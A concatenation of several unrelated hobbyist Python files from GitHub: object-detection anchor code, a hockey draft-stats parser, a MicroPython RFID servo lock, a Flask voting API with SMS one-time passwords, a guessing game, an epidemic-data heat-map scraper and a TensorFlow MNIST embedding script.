return (self.x - self.w // 2, self.y - self.h // 2)
def get_bottom_right(self):
return (self.x + self.w // 2, self.y + self.h // 2)
def get_anchor_centers(image: np.ndarray, grid_size=40):
'''
Gets the anchor centers to generate region proposals
'''
step = image.shape[0] // grid_size
x_ctrs = np.arange(step, image.shape[0], step)
y_ctrs = np.arange(step, image.shape[1], step)
ctrs = np.zeros((len(x_ctrs) * len(y_ctrs), 2))
idx = 0
for x in x_ctrs:
for y in y_ctrs:
ctrs[idx][0] = x - (step // 2)
ctrs[idx][1] = y - (step // 2)
idx += 1
return ctrs
def get_anchors(scales: list[float], ratios: list[float], x_center: int, y_center: int, base_size: int = 32):
'''
Returns a list of anchor boxes around the same (x,y) center
anchor: (width, height, x_center, y_center)
'''
anchor = np.array([base_size, base_size, 0, 0])
dims = ratio_enum(anchor, ratios)
arr = []
for dim in dims:
arr.append(scale_enum(dim, scales))
arr = np.vstack(arr)
arr[:,2] = x_center
arr[:,3] = y_center
return arr
def ratio_enum(anchor: np.array, ratios):
'''
Enumerate a set of anchors for each ratios.
'''
w, h, x, y = anchor
size = w * h
size_ratios = size / ratios
ws = np.round(np.sqrt(size_ratios))
hs = np.round(ws * ratios)
dims = np.zeros((len(ratios), 4))
dims[:,0] = ws
dims[:,1] = hs
return dims
def scale_enum(anchor, scales):
"""
Enumerate a set of anchors for each scale.
"""
w, h, x, y = anchor
ws = w * scales
hs = h * scales
dims = np.zeros((len(scales), 4))
dims[:,0] = ws
dims[:,1] = hs
return dims
def add_boxes_to_image(image, anchors):
fig, ax = plt.subplots()
ax.imshow(image)
for i in range(len(anchors)):
coord = (anchors[i][2] - anchors[i][0]//2,anchors[i][3] - anchors[i][1]//2)
rect = patches.Rectangle(coord, anchors[i][0], anchors[i][1], linewidth=1, edgecolor='r', facecolor='none')
ax.add_patch(rect)
rect = patches.Rectangle((70,41), 120, 155, linewidth=2, edgecolor='b', facecolor='none')
ax.add_patch(rect)
plt.show()
def add_dots(image, centers):
fig, ax = plt.subplots()
ax.imshow(image)
for x, y in centers:
circle = patches.Circle((x,y), 1, facecolor='red')
ax.add_patch(circle)
plt.show()
def temp(image, anchors, ground_truth, i):
fig, ax = plt.subplots()
ax.imshow(image)
coord = (anchors[i][2] - anchors[i][0]//2,anchors[i][3] - anchors[i][1]//2)
rect = patches.Rectangle(coord, anchors[i][0], anchors[i][1], linewidth=1, edgecolor='r', facecolor='none')
ax.add_patch(rect)
coord = (ground_truth[2] - ground_truth[0]//2, ground_truth[3] - ground_truth[1]//2)
rect = patches.Rectangle(coord, ground_truth[0], ground_truth[1], linewidth=2, edgecolor='b', facecolor='none')
ax.add_patch(rect)
plt.show()
def get_all_anchors(centers, scales, ratios, image_dim, base_size=45):
all_anchors = []
for x, y in centers:
anchors = np.ndarray.tolist(get_anchors(scales, ratios, x, y, 32))
copy = anchors.copy()
for i in range(len(anchors)):
w, h, x_c, y_c = anchors[i]
left = x_c - w//2
right = x_c + w//2
up = y_c - h//2
down = y_c + h//2
if left < 0 or right > image_dim[0] or up < 0 or down > image_dim[1]:
copy.remove(anchors[i])
all_anchors.extend(copy)
return all_anchors
def get_positive_boxes(anchors, ground_truth):
pos_anchors = []
neg_anchors = []
highest = ((0,0,0,0), 0)
for anchor in anchors:
iou = get_iou(anchor, ground_truth)
if iou > 0.7:
pos_anchors.append((anchor, iou))
if iou < 0.3:
neg_anchors.append((anchor, iou))
if iou > highest[1]:
highest = (anchor, iou)
if len(pos_anchors) == 0:
pos_anchors.append(highest)
return pos_anchors, neg_anchors
def mergeSort(arr):
if len(arr) > 1:
mid = len(arr)//2
arrLeft = arr[:mid].copy()
arrRight = arr[mid:].copy()
# Sort the two halves
arrLeft = mergeSort(arrLeft)
arrRight = mergeSort(arrRight)
# Initial values for pointers that we use to keep track of where we are in each array
i = j = k = 0
# Until we reach the end of either start or end, pick larger among
# elements start and end and place them in the correct position in the sorted array
while i < len(arrLeft) and j < len(arrRight):
if arrLeft[i][1] > arrRight[j][1]:
arr[k] = arrLeft[i]
i += 1
else:
arr[k] = arrRight[j]
j += 1
k += 1
# When all elements are traversed in either arr1 or arr2,
# pick up the remaining elements and put in sorted array
while i < len(arrLeft):
arr[k] = arrLeft[i]
i += 1
k += 1
while j < len(arrRight):
arr[k] = arrRight[j]
j += 1
k += 1
return arr
def non_max_threshold(anchors: np.array, threshold: float=0.5):
'''
input: anchors -> list((anchor, iou))
output: non_max -> list((anchor, iou))
computes non-maximum thresholding on all anchors in anchors
'''
assert threshold < 1.0 and threshold > 0.0
final_anchors = []
anchors = mergeSort(anchors)
while np.any(anchors):
best = anchors[0]
temp_anchors = anchors[1:]
to_delete = []
to_delete.append(0)
for i in range(len(temp_anchors)):
iou = get_iou(best[0], anchors[i][0])
if iou > threshold:
to_delete.append(i+1)
final_anchors.append(best)
anchors = np.delete(anchors, to_delete, 0)
return final_anchors
def get_sample_neg(anchors, num_anchors):
l = len(anchors)
interval = l // num_anchors
samples = []
for i in range(num_anchors):
idx = random.randint(i*interval, (i+1)*interval - 1)
samples.append(anchors[idx])
return samples
def iou_test():
box1 = {}
box1["x1"] = 70
box1["x2"] = 190
box1["y1"] = 41
box1["y2"] = 196
box2 = {}
box2["x1"] = 233
box2["x2"] = 255
box2["y1"] = 206
box2["y2"] = 255
#print(get_iou(anchors[idx], ground_truth))
print(get_iou_dict(box1, box2))
if __name__ == "__main__":
image = get_image("sample_images/dandi_test.jpg")
ctrs = get_anchor_centers(image, 20)
scales = np.array([1, 2, 4])
ratios = np.array([0.5, 1, 2])
anchors = np.ndarray.tolist(get_anchors(scales, ratios, 128, 128, 32))
# image = Image.open("sample_images/dandi_test.jpg")
# add_boxes_to_image(image, anchors)
# add_dots(image, ctrs)
idx = 5
# bounding box for dandi_test.jpg
ground_truth = (120, 155, 130, 118)
#temp(image, anchors, idx)
all_anchors = get_all_anchors(ctrs, scales, ratios, image.shape, 45)
pos_anchors, neg_anchors = get_positive_boxes(all_anchors, ground_truth)
samples = np.array(get_sample_neg(neg_anchors, 20))
pos_anchors = np.array(pos_anchors)
add_boxes_to_image(image, samples[:,0])
add_boxes_to_image(image, pos_anchors[:,0])
thres_anchors = np.array(non_max_threshold(pos_anchors, 0.5))
add_boxes_to_image(image, thres_anchors[:,0])
#temp(image, anchors, ground_truth, idx)
| huffman19/plant-rec | anchors.py | anchors.py | py | 8,348 | python | en | code | 0 | github-code | 90 |
71580663017 | import os
import re
import pandas as pd
Draftee = {
'Rank' : [],
'Name' : [],
'Pos' : [],
'Shot' : [],
'Age' : [],
'DoB' : [],
'Height' : [],
'Weight' : [],
'Country' : [],
'Team' : [],
'Leaugue' : [],
'GP' : [],
'G' : [],
'A' : [],
'Pts' : [],
'+/-' : [],
'PIM' : [],
'FI' : [],
'SH' : [],
'PL' : [],
'ST' : [],
'CH' : [],
'PO' : [],
'HI' : [],
'SK' : [],
'EN' : [],
'PE' : [],
'FA' : [],
'LE' : [],
'SR' : [],
'OFF' : [],
'DEF' : [],
'OVE' : [],
}
def colour_rating(value):
if 'A' in str(value):
result = "color: red"
elif 'B' in str(value):
result = "color: blue"
elif 'C' in str(value):
result = "color: grey"
else:
result = "color: black"
return result
def colour_offense(value):
return "background-color: purple"
def colour_defense(value):
return "background-color: orange"
def colour_overall(value):
return "background-color: green"
print("Preparing to compile CSB. ")
dir = os.path.dirname(os.path.abspath(__file__))
main_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
fname = os.path.join(main_dir,"Data Exporters\Hidden Data\CSB.txt")
with open(fname) as f:
content = f.readlines()
# you may also want to remove whitespace characters like `\n` at the end of each line
content = [x.strip() for x in content]
print("Analyzing CSB text")
for line in content:
text = line.split()
if "#" in line:
##start of a new player
line_num = 1
if line_num == 1:
Draftee['Rank'].append(int(line[1:line.find(text[1])-1]))
Name = str(text[1] + " " + text[2]).decode('utf-8').encode('ascii','ignore')
Draftee['Name'].append(Name)
Draftee['Pos'].append(text[3])
Draftee['Shot'].append(text[4][5:])
elif line_num == 2:
Draftee['Age'].append(int(text[1]))
Draftee['DoB'].append(text[3])
Draftee['Height'].append(text[5])
Draftee['Weight'].append(text[7])
elif line_num == 3:
Country = line.find("Country: ")
Team = line.find("Team: ")
League = line.find("League: ")
Draftee['Country'].append(line[Country+len("Country: "):Team-1])
Draftee['Team'].append(line[Team+len("Team: "):League-1])
Draftee['Leaugue'].append(line[League+len("League: "):])
elif line_num == 4:
Draftee['GP'].append((int(text[1])))
Draftee['G'].append((int(text[3])))
Draftee['A'].append((int(text[5])))
Draftee['Pts'].append((int(text[7])))
Draftee['+/-'].append((int(text[9])))
Draftee['PIM'].append(text[11])
# elif line_num == 5:
#skip
elif line_num == 6:
Draftee['SH'].append(text[1])
Draftee['PL'].append(text[3])
Draftee['ST'].append(text[5])
Draftee['CH'].append(text[7])
Draftee['PO'].append(text[9])
Draftee['HI'].append(text[11])
elif line_num == 7:
Draftee['SK'].append(text[1])
Draftee['EN'].append(text[3])
Draftee['PE'].append(text[5])
Draftee['FA'].append(text[7])
Draftee['LE'].append(text[9])
Draftee['SR'].append(text[11])
Draftee['FI'].append(text[13])
elif line_num == 8 :
Draftee['OFF'].append(text[1])
Draftee['DEF'].append(text[3])
Draftee['OVE'].append(text[5])
# elif line_num > 9 :
#skip
elif line_num > 12:
print("INFINITE LOOP OR SOMETHING! AHHHHHHHHHHHHHH!!!!!!!!")
break
line_num += 1
print("Committing data to tables.")
Draft = pd.DataFrame(Draftee)
Draft = Draft[['Rank', 'Name', 'Pos', 'Shot', 'Age', 'DoB', 'Height', 'Weight', 'Country', 'Team', 'Leaugue', 'GP', 'G', 'A', 'Pts', '+/-', 'PIM', 'FI', 'SH', 'PL', 'ST', 'CH', 'PO', 'HI', 'SK', 'EN', 'PE', 'FA', 'LE', 'SR', 'OFF', 'DEF', 'OVE']]
Draft = Draft.sort_values(by=['Rank'], ascending = True)
html = (Draft.style.\
set_properties(**{'border-width' : 'thin', 'border-color' : 'black'}).\
applymap(colour_offense, subset=['SH', 'PL', 'ST', 'OFF']).\
applymap(colour_defense, subset=['CH', 'PO', 'HI', 'DEF']).\
applymap(colour_overall, subset=['SK', 'EN', 'PE', 'FA', 'LE', 'SR', 'OVE']).\
applymap(colour_rating, subset=['SH', 'PL', 'ST', 'OFF', 'CH', 'PO', 'HI', 'DEF', 'SK', 'EN', 'PE', 'FA', 'LE', 'SR', 'OVE']).render())
# Draft.style
print("Exporting data to .html file")
reports_dir = os.path.join(main_dir,'Reports')
if not os.path.exists(reports_dir):
os.makedirs(reports_dir)
with open(os.path.join(reports_dir,'Draft.html'), 'w') as f:
f.write(html)
# Draft.to_html(os.path.join(reports_dir,'Draft.html'),index = False, columns = ['Rank', 'Name', 'Pos', 'Shot', 'Age', 'DoB', 'Height', 'Weight', 'Country', 'Team', 'Leaugue', 'GP', 'G', 'A', 'Pts', '+/-', 'PIM', 'FI', 'SH', 'PL', 'ST', 'CH', 'PO', 'HI', 'SK', 'EN', 'PE', 'FA', 'LE', 'SR', 'OFF', 'DEF', 'OVE']) | MasonV/Ros | CSBComp.py | CSBComp.py | py | 4,696 | python | en | code | 0 | github-code | 90 |
44055165323 | from mfrc522 import MFRC522
from machine import Pin
from machine import Pin, PWM
import utime
import tm1637
from time import sleep_ms,sleep
tm = tm1637.TM1637(clk=Pin(13), dio=Pin(12))
green_led = Pin(25, Pin.OUT)
red_led = Pin(15, Pin.OUT)
servoPin = PWM(Pin(16))
servoPin.freq(50) #50Hz(20msec...定值,超過會亂動)
def servo(degrees):
if degrees > 180: degrees = 180
if degrees < 0: degrees = 0
#20ms/65535 = 0.0003
maxDuty = 9000 #9000: 0.0003 x 9000 = 0.9ms
minDuty = 1000 #1000: 0.0003 x 1000 = 0.3ms
newDuty = minDuty+(maxDuty-minDuty)*(degrees/180)
servoPin.duty_u16(int(newDuty))
# 將卡號由 2 進位轉換為 16 進位的字串
def uidToString(uid):
mystring = ""
for i in uid:
mystring = "%02X" % i + mystring
return mystring
reader = MFRC522(spi_id=0,sck=2,miso=4,mosi=3,cs=26,rst=10)
print("..... 請將卡片靠近感應器.....")
try:
while True:
(stat, tag_type) = reader.request(reader.REQIDL) # 搜尋 RFID 卡片
if stat == reader.OK: # 找到卡片
(stat, uid) = reader.SelectTagSN()
if stat == reader.OK:
card_num = uidToString(uid)
print(".....卡片號碼: %s" % card_num)
if card_num == '202E30A0':#'7A811D60':
tm.write([0b00000000, 0b00111101, 0b00111111, 0b00000000])
for degree in range(0, 180, 1):
servo(degree)
sleep(0.01)
print('....Welcome....')
green_led.value(1) # 讀到授權的卡號後點亮綠色 LED
utime.sleep(2) # 亮 2 秒鐘
green_led.value(0)
else:
tm.write([0b01101101, 0b01110100, 0b00000110, 0b01111000])
print(".....卡片錯誤.....")
red_led.value(1) # 讀到非授權的卡號後點亮紅色 LED
utime.sleep(2) # 亮 2 秒鐘
red_led.value(0)
else:
print(".....授權錯誤.....")
except KeyboardInterrupt:
print(".....Bye.....") | feifeifeii/RaspberryPiPico-test | RFID_Read_1.py | RFID_Read_1.py | py | 2,202 | python | en | code | 0 | github-code | 90 |
3714284428 | from flask import Blueprint, redirect, request, url_for, jsonify
from twilio.rest import Client
from extensions import db
from models import User, Candidate, Role, Vote
from utils import transform_phone_number
import requests
import os
main = Blueprint('main', __name__)
account_sid = os.environ.get("ACCOUNT_SID")
auth_token = os.environ.get("AUTH_TOKEN")
verify_sid = os.environ.get("VERIFY_SID")
client = Client(account_sid, auth_token)
@main.route('/')
def index():
users = User.query.all()
users_list_html = [
f"<li>{user.username}, {user.dob}, {user.gender}, {user.number}, {user.classOfUser}</li>"
for user in users
]
return f"<ul>{''.join(users_list_html)}</ul>"
@main.route('/enroll_user', methods=['POST'])
def add_user():
data = request.json
# Check if all required fields are present
required_fields = ['username', 'dob', 'gender', 'number', 'classOfUser']
missing_fields = [field for field in required_fields if field not in data]
if missing_fields:
return jsonify({"error": f"Missing fields: {', '.join(missing_fields)}"}), 400
username = data['username']
dob = data['dob']
gender = data['gender']
number = data['number']
classOfUser = data['classOfUser']
# Check if any of the required fields are empty
if not all(data[field] for field in required_fields):
return jsonify({"error": "All fields are required"}), 400
new_user = User(username=username, dob=dob, gender=gender, number=number, classOfUser=classOfUser)
db.session.add(new_user)
db.session.commit()
user_add_response = {
username: "added"
}
return jsonify(user_add_response), 200
@main.route('/find_user', methods=['POST'])
def find_user():
number = request.json.get('number')
if not number:
return jsonify({"error": "Phone number is required"}), 400
user = User.query.filter_by(number=number).first()
if not user:
return jsonify({"error": "User not found"}), 404
user_data = {
"username": user.username,
"dob": user.dob,
"gender": user.gender,
"number": user.number,
"classOfUser": user.classOfUser
}
return jsonify(user_data), 200
@main.route('/send_otp', methods=['POST'])
def send_otp():
number = request.json.get('number')
if not number:
return jsonify({"error": "Phone number is required"}), 400
user = User.query.filter_by(number=number).first()
if not user:
return jsonify({"error": "User not found"}), 404
number_with_countrycode = transform_phone_number(number)
verification = client.verify.v2.services(verify_sid) \
.verifications \
.create(to=number_with_countrycode, channel="sms")
return jsonify({"message": "OTP has been sent"}), 200
@main.route('/confirm_otp', methods=['POST'])
def confirm_otp():
number = request.json.get('number')
otp = request.json.get('otp')
if not number or not otp:
return jsonify({"error": "Phone number and OTP are required"}), 400
number_with_countrycode = transform_phone_number(number)
verification_check = client.verify.v2.services(verify_sid) \
.verification_checks \
.create(to=number_with_countrycode, code=otp)
if verification_check.status == "approved":
user = User.query.filter_by(number=number).first()
if not user:
return jsonify({"error": "User not found"}), 404
return jsonify(user.as_dict()), 200
else:
return jsonify({"error": "Invalid OTP"}), 400
# create and populate db
@main.route('/init_setup', methods=['GET'])
def init_setup():
db.create_all()
roles = ["President", "Vice President", "General Secretary", "Financial Secretary"]
for role in roles:
new_role = Role(role=role)
db.session.add(new_role)
db.session.commit()
roles = Role.query.all()
candidates = ["Georgette Nana Yaa Tedeku", "Yenulom Lambon", "Omar Abdul Bakie"]
for role in roles:
for candidate in candidates:
new_candidate = Candidate(role_id=role.id, candidate=candidate)
db.session.add(new_candidate)
db.session.commit()
return jsonify({"message": "Success"}), 200
# get roles
@main.route('/roles', methods=['GET'])
def get_roles():
roles = Role.query.all()
if not roles:
return jsonify([]), 200
roles = [role.as_dict() for role in roles]
return jsonify(roles), 200
# get role by id
@main.route('/role', methods=['GET'])
def get_role():
role_id = request.args.get('role_id', default = 1, type = int)
role = Role.query.filter_by(id=role_id).first()
if not role:
return jsonify({"error": "Role not found"}), 404
role = role.as_dict()
return jsonify(role), 200
# create role
@main.route('/create_role', methods=['POST'])
def create_role():
role = request.json.get('role')
if not role:
return jsonify({"error": "Role field is required"}), 400
new_role = Role(role=role)
db.session.add(new_role)
db.session.commit()
return jsonify({"message": "Role added"}), 200
# create dummy roles
@main.route('/create_dummy_roles', methods=['POST'])
def create_dummy_roles():
roles = ["President", "Vice President", "General Secretary", "Financial Secretary"]
for role in roles:
new_role = Role(role=role)
db.session.add(new_role)
db.session.commit()
return jsonify({"message": "Roles added"}), 200
# get candidates for a role as a param
@main.route('/candidates', methods=['GET'])
def get_candidates():
role_id = request.args.get('role_id', default = 1, type = int)
candidates = Candidate.query.filter_by(role_id=role_id).all()
if not candidates:
return jsonify([]), 200
candidates = [candidate.as_dict() for candidate in candidates]
return jsonify(candidates), 200
# create candidate for a role
@main.route('/create_candidate', methods=['POST'])
def create_candidate():
role_id = request.json.get('role_id')
candidate = request.json.get('candidate')
if not role_id or not candidate:
return jsonify({"error": "Role and candidate fields are required"}), 400
role = Role.query.filter_by(id=role_id).first()
if not role:
return jsonify({"error": "Role not found"}), 404
new_candidate = Candidate(role_id=role.id, candidate=candidate)
db.session.add(new_candidate)
db.session.commit()
return jsonify({"message": "Candidate added"}), 200
# create dummy candidates
@main.route('/create_dummy_candidates', methods=['POST'])
def create_dummy_candidates():
roles = Role.query.all()
candidates = ["Barak", "Trump", "Addo", "Harris", "Bob"]
for role in roles:
for candidate in candidates:
new_candidate = Candidate(role_id=role.id, candidate=candidate)
db.session.add(new_candidate)
db.session.commit()
return jsonify({"message": "Candidates added"}), 200
# Has user voted for role
@main.route('/has_user_voted', methods=['POST'])
def has_user_voted():
number = request.json.get('number')
role_id = request.json.get('role_id')
user = User.query.filter_by(number=number).first()
if not user:
return jsonify({"error": "User not found"}), 404
role = Role.query.filter_by(id=role_id).first()
if not role:
return jsonify({"error": "Role not found"}), 404
# check if votes contain user_id and role_id
already_voted = Vote.query.filter_by(user_id=user.id, roles_id=role.id).first()
if already_voted:
return jsonify({ "status": True }), 200
else:
return jsonify({ "status": False }), 200
# vote for a candidate
@main.route('/vote', methods=['POST'])
def vote():
number = request.json.get('number')
role_id = request.json.get('role_id')
candidate_id = request.json.get('candidate_id')
if not number or not role_id or not candidate_id:
return jsonify({"error": "Phone number, role and candidate fields are required"}), 400
user = User.query.filter_by(number=number).first()
if not user:
return jsonify({"error": "User not found"}), 404
role = Role.query.filter_by(id=role_id).first()
if not role:
return jsonify({"error": "Role not found"}), 404
candidate = Candidate.query.filter_by(id=candidate_id).first()
if not candidate:
return jsonify({"error": "Candidate not found"}), 404
# check if votes contain user_id and role_id
already_voted = Vote.query.filter_by(user_id=user.id, roles_id=role.id).first()
if already_voted:
return jsonify({"error": "User has already voted for this role"}), 400
new_vote = Vote(user_id=user.id, roles_id=role.id, candidate_id=candidate.id)
db.session.add(new_vote)
db.session.commit()
return jsonify({"message": "Vote added"}), 200
# get results for a role
@main.route('/results', methods=['POST'])
def get_results():
role_id = request.json.get('role_id')
if not role_id:
return jsonify({"error": "Role field is required"}), 400
role = Role.query.filter_by(id=role_id).first()
if not role:
return jsonify({"error": "Role not found"}), 404
candidates = Candidate.query.filter_by(role_id=role.id).all()
if not candidates:
return jsonify({"message": "No candidates found for role"}), 404
# get votes for each candidate
votes = []
for candidate in candidates:
vote_count = Vote.query.filter_by(candidate_id=candidate.id).count()
votes.append(vote_count)
# get candidate names
candidate_names = [candidate.candidate for candidate in candidates]
# create json object
results = {
"role": role.role,
"candidates": candidate_names,
"votes": votes
}
return jsonify(results), 200
| CozyBrian/voting-server | routes.py | routes.py | py | 10,264 | python | en | code | 0 | github-code | 90 |
33687052749 | import random
print("==> NUMBER GUESSING GAME <==")
#win_number = 500
#count = 1
#guess_number = int(input("Kindly pick a random number from 1 to 100: "))
def set_difficulty():
level = input("Choose a difficulty. Type 'EASY' or 'HARD': ").lower()
if level == "easy":
return 10 #reture 10 chances
else:
return 5
def check_answer(guess, answer, turns):
if guess_number > answer:
print("Too high, Please try again")
return turns -1
elif guess_number < answer:
print("Too low, Please try again")
return turns -1
else:
print(f"\nYou got it...the answer is {answer}")
answer = random.randint(1, 100)
turns = set_difficulty()
guess_number = 0
while guess_number != answer:
guess_number = int(input("Kindly pick a random number from 1 to 100: "))
turns = check_answer(guess_number, answer, turns)
print(f"\nYou have {turns} attempts remainings to guess the number \n")
if turns == 0:
print("\nYou are out of attempt")
break
print(f"\nYou have {turns} attempts remainings to guess the number \n")
#Random number 2
import random
class Dice:
def roll(self):
first = random.randint(1, 6)
second = random.randint(1, 6)
return first, second
dice = Dice()
print(dice.roll())
| Innocentsax/Python_Series | Bootcamp/guess_number_game.py | guess_number_game.py | py | 1,323 | python | en | code | 29 | github-code | 90 |
2925293970 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Feb 2 19:00:58 2020
@author: bob
"""
import pandas as pd
import numpy as np
import requests
import folium
import webbrowser
from folium.plugins import HeatMap
def city(province):
'''
处理港澳地区无城市的情况
province: 类型:字典型
return: 包含以下内容的 list
'''
d = {} #创建字典保存数据
#d['province'] = province['provinceName']
d['cityName'] = province['provinceName'] #获取省份名称
d['confirmed'] = province['confirmedCount'] #确诊数
d['suspected'] = province['suspectedCount'] #疑似数
d['cured'] = province['curedCount'] #治愈数
d['dead'] = province['deadCount'] #死亡数
return list(d.values()) #返回上述内容list
def requestData():
'''
获取最新疫情数据, 保存至当前目录为 日期.csv 文件
return: 文件名(日期.csv)
'''
#数据更新网址
url = 'http://tianqiapi.com/api?version=epidemic&appid=23035354&appsecret=8YvlPNrz'
#返回 json 格式数据
data = pd.read_json(url, orient='colums')
#提取到总数据 待提取相关详细数据
Epidemic_data = data['data']
#数据日期
Data_date = Epidemic_data['date'].split()[0]
#columns = ['provinceName', 'cityName', 'confirmed', 'suspected', 'cured', 'dead']
columns = ['cityName', 'confirmed', 'suspected', 'cured', 'dead']
#创建全国疫情数据 DataFrame
China_Data = pd.DataFrame(columns=['provinceName',
'cityName',
'confirmed',
'suspected',
'cured',
'dead'])
#获取所有省份数据
Country_Data = Epidemic_data['area']
for province in Country_Data: #遍历每一个省份
provinceName = province['preProvinceName'] #获取省份名称
try:
ProvinceData = province['cities'] #获取该省份下所有城市数据
city_Data = []
for province in ProvinceData: #遍历所有城市
city_Data.append(list(province.values()))
#构建 DataFrame 格式
CityData = pd.DataFrame(np.array(city_Data), columns=columns)
#新增省份列属性, 设置省份名称
CityData['provinceName'] = provinceName
#更新至总数据中
China_Data = pd.concat([China_Data, CityData], ignore_index=True)
except:#处理香港, 澳门等单一城市的数据 代码类似
CityData = pd.DataFrame(np.array([city(province)]), columns=columns)
CityData['provinceName'] = provinceName
China_Data = pd.concat([China_Data, CityData], ignore_index=True)
#print(CityData)
#print(pd.DataFrame(np.array([city(province)]), columns=columns))
#none_City.append(city(province))
#将省份和城市作分级 保存 csv
China_Data.set_index(['provinceName', 'cityName'], inplace=True)
#保存文件名称以数据日期为准
fileName = Data_date + '.csv'
China_Data.to_csv(fileName)
return fileName
def getCityLocation(cityList):
'''
用于获取城市经纬度
cityList: 全国城市名称的 list
return: 城市经纬度的 DataFrame
'''
url = "http://api.map.baidu.com/geocoder/v2/"
header = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36'}
payload = {
'output':'json',
'ak':'X8zlxPUdSe2weshrZ1WqnWxb43cfBI2N'
}
addinfo = []
for city in cityList:
payload['address'] = city
try:
content = requests.get(url,params=payload,headers=header).json()
longitude = content['result']['location']['lng']
latitude = content['result']['location']['lat']
addinfo.append([city, longitude, latitude])
#addinfo.append(content['result']['location'])
print("正在获取{}的地址!".format(city))
except:
print("地址{}获取失败,请稍后重试!".format(city))
pass
#time.sleep(.1)
columns = ['cityName', 'longitude', 'latitude']
data = pd.DataFrame(np.array(addinfo), columns=columns)
#print(data)
print("所有地址均已获取完毕!!!")
return(data)
def Visualization(UpdateData):
latitude = np.array(UpdateData["latitude"])
longitude = np.array(UpdateData["longitude"])
confirmed = np.array(UpdateData["confirmed"],dtype=float)
Vis_Data = [[latitude[i],longitude[i],confirmed[i]] for i in range(len(UpdateData))]
map_osm = folium.Map(location=[30,114],zoom_start=10)
HeatMap(Vis_Data).add_to(map_osm)
file_path = r"Visualization.html"
map_osm.save(file_path) #保存本地
webbrowser.open(file_path) #在本地浏览器打开
fileName = requestData() #获取当天数据 并返回文件名
data = pd.read_csv(fileName) #读取原始数据
cityList = data['cityName'].tolist() #获取所有城市列表
location = getCityLocation(cityList) #获取城市经纬度
UpdateData = pd.merge(data, location, #更新经纬度
on='cityName',
how = 'left')
#保存可视化数据
#UpdateData.to_csv('Visualization_Data.csv')
VisualData = UpdateData.dropna() #剔除缺失值 可视化数据
Visualization(VisualData)
| HanMENG15990045033/Epidemic_2020 | 03Epidemic_2020/Epidemic_Data.py | Epidemic_Data.py | py | 5,820 | python | en | code | 4 | github-code | 90 |
17976110439 | import sys
read = sys.stdin.read
readline = sys.stdin.readline
readlines = sys.stdin.readlines
sys.setrecursionlimit(10 ** 9)
INF = 1 << 60
MOD = 1000000007
def main():
A, B = map(int, read().split())
if A % 3 == 0 or B % 3 == 0 or (A + B) % 3 == 0:
print('Possible')
else:
print('Impossible')
return
if __name__ == '__main__':
main()
| Aasthaengg/IBMdataset | Python_codes/p03657/s952517566.py | s952517566.py | py | 378 | python | en | code | 0 | github-code | 90 |
18029735589 | # -*- coding: utf-8 -*-
import sys
sys.setrecursionlimit(10**9)
INF=10**18
MOD=10**9+7
input=lambda: sys.stdin.readline().rstrip()
YesNo=lambda b: bool([print('Yes')] if b else print('No'))
YESNO=lambda b: bool([print('YES')] if b else print('NO'))
int1=lambda x:int(x)-1
def main():
N,A,B=map(int,input().split())
X=list(map(int,input().split()))
z=B//A
ans=0
for i in range(N-1):
if X[i+1]-X[i]>z:
ans+=B
else:
ans+=(X[i+1]-X[i])*A
print(ans)
if __name__ == '__main__':
main()
| Aasthaengg/IBMdataset | Python_codes/p03829/s402979084.py | s402979084.py | py | 549 | python | en | code | 0 | github-code | 90 |
8286375281 | # -*- coding: utf-8 -*-
"""
Created on Thu May 11 11:20:33 2017
@author: darren
"""
import tensorflow as tf
import sys
import os
#versioning, urllib named differently for dif python versions
if sys.version_info[0] >= 3:
from urllib.request import urlretrieve
else:
from urllib import urlretrieve
# tsv is the file which contain the label of each picture.
# png is the file which put all of the small picture together.
# obtain the location where you run the code
os_location=os.getcwd()
LOGDIR = os_location+'/embedding_data/'
GITHUB_URL ='https://raw.githubusercontent.com/darren1231/Tensorflow_tutorial/master/10_hidden_mnist_embedding/'
mnist = tf.contrib.learn.datasets.mnist.read_data_sets(train_dir=LOGDIR + 'data', one_hot=True)
urlretrieve(GITHUB_URL + 'labels_1024.tsv', LOGDIR + 'labels_1024.tsv')
urlretrieve(GITHUB_URL + 'sprite_1024.png', LOGDIR + 'sprite_1024.png')
def weight_variable(shape):
initial = tf.truncated_normal(shape,stddev=0.1)
return tf.Variable(initial)
def bias_variable(shape):
initail = tf.constant(0.1,shape=shape)
return tf.Variable(initail)
def conv2d(x,w):
return tf.nn.conv2d(x,w,strides=[1,1,1,1],padding='SAME')
def max_pool_2x2(x):
return tf.nn.max_pool(x,ksize=[1,2,2,1],strides=[1,2,2,1],padding='SAME')
def cnn_model():
desired_input = tf.placeholder(tf.float32,[None,784])
desired_output = tf.placeholder(tf.float32,[None,10])
x_image = tf.reshape(desired_input,[-1,28,28,1])
#network weights
with tf.name_scope("cnn_net"):
with tf.name_scope("w_conv_1"):
w_conv1= weight_variable([5,5,1,32])
b_conv1= bias_variable([32])
tf.summary.histogram("w_conv1",w_conv1)
tf.summary.histogram("b_conv1",b_conv1)
with tf.name_scope("w_conv_2"):
w_conv2 = weight_variable([5,5,32,64])
b_conv2 = bias_variable([64])
tf.summary.histogram("w_conv2",w_conv2)
tf.summary.histogram("b_conv2",b_conv2)
with tf.name_scope("fc1"):
w_fc1 = weight_variable([7*7*64,1024])
b_fc1 = bias_variable([1024])
tf.summary.histogram("w_fc1",w_fc1)
tf.summary.histogram("b_fc1",b_fc1)
with tf.name_scope("fc2"):
w_fc2 = weight_variable([1024,10])
b_fc2 = bias_variable([10])
tf.summary.histogram("w_fc2",w_fc2)
tf.summary.histogram("b_fc2",b_fc2)
with tf.name_scope("conv1"):
h_conv1 = tf.nn.relu(conv2d(x_image,w_conv1)+b_conv1)
h_pool1 = max_pool_2x2(h_conv1)
with tf.name_scope("conv2"):
h_conv2 = tf.nn.relu(conv2d(h_pool1,w_conv2)+b_conv2)
h_pool2 = max_pool_2x2(h_conv2)
with tf.name_scope("fully_connected"):
h_pool2_flat = tf.reshape(h_pool2,[-1,7*7*64])
h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat,w_fc1)+b_fc1)
net_output = tf.nn.softmax(tf.matmul(h_fc1,w_fc2)+b_fc2)
embedding_input = net_output
embedding_size = 10
return desired_input,desired_output,net_output,embedding_input,embedding_size
def hidden_model():
desired_input = tf.placeholder(tf.float32,[None,784])
desired_output = tf.placeholder(tf.float32,[None,10])
with tf.name_scope("784_10_network"):
